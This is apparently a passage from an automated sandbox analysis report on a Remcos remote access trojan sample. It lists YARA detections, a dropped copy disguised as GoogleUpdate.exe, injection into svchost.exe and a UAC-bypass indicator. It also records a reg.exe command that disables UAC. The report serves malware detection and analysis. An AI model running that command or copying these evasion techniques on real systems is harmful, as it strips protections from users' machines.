                  Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPEDMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeProcess Stats: CPU usage > 49%
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041642D GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_0041642D
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_00414DB4
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_00414DB4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D64DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_02D64DB4
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_00414DB4
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,18_2_00414DB4
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004251520_2_00425152
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004352860_2_00435286
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004513D40_2_004513D4
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0045050B0_2_0045050B
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004365100_2_00436510
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004316FB0_2_004316FB
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0043569E0_2_0043569E
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004437000_2_00443700
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004257FB0_2_004257FB
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004128E30_2_004128E3
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_004259640_2_00425964
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041B9170_2_0041B917
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0043D9CC0_2_0043D9CC
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00435AD30_2_00435AD3
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00424BC30_2_00424BC3
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0043DBFB0_2_0043DBFB
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0044ABA90_2_0044ABA9
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00433C0B0_2_00433C0B
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00434D8A0_2_00434D8A
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0043DE2A0_2_0043DE2A
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041CEAF0_2_0041CEAF
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_00435F080_2_00435F08
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0042515210_2_00425152
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0043528610_2_00435286
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004513D410_2_004513D4
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0045050B10_2_0045050B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0043651010_2_00436510
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004316FB10_2_004316FB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0043569E10_2_0043569E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0044370010_2_00443700
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004257FB10_2_004257FB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_004128E310_2_004128E3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0042596410_2_00425964
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041B91710_2_0041B917
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0043D9CC10_2_0043D9CC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00435AD310_2_00435AD3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00424BC310_2_00424BC3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0043DBFB10_2_0043DBFB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0044ABA910_2_0044ABA9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00433C0B10_2_00433C0B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00434D8A10_2_00434D8A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0043DE2A10_2_0043DE2A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_0041CEAF10_2_0041CEAF
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 10_2_00435F0810_2_00435F08
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D8528613_2_02D85286
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02DA13D413_2_02DA13D4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D7515213_2_02D75152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D816FB13_2_02D816FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D8569E13_2_02D8569E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D757FB13_2_02D757FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D9370013_2_02D93700
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D8651013_2_02D86510
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02DA050B13_2_02DA050B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D85AD313_2_02D85AD3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D74BC313_2_02D74BC3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D8DBFB13_2_02D8DBFB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D9ABA913_2_02D9ABA9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D628E313_2_02D628E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D8D9CC13_2_02D8D9CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D7596413_2_02D75964
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D6B91713_2_02D6B917
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D6CEAF13_2_02D6CEAF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D8DE2A13_2_02D8DE2A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D85F0813_2_02D85F08
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D83C0B13_2_02D83C0B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_02D84D8A13_2_02D84D8A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0042515215_2_00425152
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0043528615_2_00435286
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004513D415_2_004513D4
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0045050B15_2_0045050B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0043651015_2_00436510
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004316FB15_2_004316FB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0043569E15_2_0043569E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0044370015_2_00443700
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004257FB15_2_004257FB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_004128E315_2_004128E3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0042596415_2_00425964
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0041B91715_2_0041B917
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0043D9CC15_2_0043D9CC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00435AD315_2_00435AD3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00424BC315_2_00424BC3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0043DBFB15_2_0043DBFB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0044ABA915_2_0044ABA9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00433C0B15_2_00433C0B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00434D8A15_2_00434D8A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0043DE2A15_2_0043DE2A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_0041CEAF15_2_0041CEAF
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 15_2_00435F0815_2_00435F08
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0042515218_2_00425152
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0043528618_2_00435286
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004513D418_2_004513D4
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0045050B18_2_0045050B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0043651018_2_00436510
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004316FB18_2_004316FB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0043569E18_2_0043569E
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0044370018_2_00443700
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004257FB18_2_004257FB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_004128E318_2_004128E3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0042596418_2_00425964
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0041B91718_2_0041B917
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0043D9CC18_2_0043D9CC
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00435AD318_2_00435AD3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00424BC318_2_00424BC3
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0043DBFB18_2_0043DBFB
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0044ABA918_2_0044ABA9
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00433C0B18_2_00433C0B
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00434D8A18_2_00434D8A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0043DE2A18_2_0043DE2A
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_0041CEAF18_2_0041CEAF
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: 18_2_00435F0818_2_00435F08
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D52073 appears 51 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D82B90 appears 53 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D82525 appears 41 times
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: String function: 00402073 appears 51 times
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: String function: 00432B90 appears 53 times
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: String function: 00432525 appears 42 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 004046D7 appears 48 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 004052DD appears 47 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00401F8B appears 48 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 0040415E appears 80 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00402073 appears 151 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 004109CC appears 45 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00439E5F appears 39 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00401E45 appears 52 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00401F66 appears 36 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 0043AA74 appears 39 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00432B90 appears 159 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 004021F3 appears 57 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 004020BF appears 57 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00432525 appears 126 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 004459F9 appears 54 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00442DE2 appears 84 times
                  Source: C:\ProgramData\GoogleDat\GoogleUpdate.exeCode function: String function: 00454C08 appears 51 times
                  Source: DB5rQYsfd6.exe, 00000000.00000002.1669075854.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs DB5rQYsfd6.exe
                  Source: DB5rQYsfd6.exe, 00000000.00000002.1669075854.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs DB5rQYsfd6.exe
                  Source: DB5rQYsfd6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  Source: DB5rQYsfd6.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: DB5rQYsfd6.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: DB5rQYsfd6.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
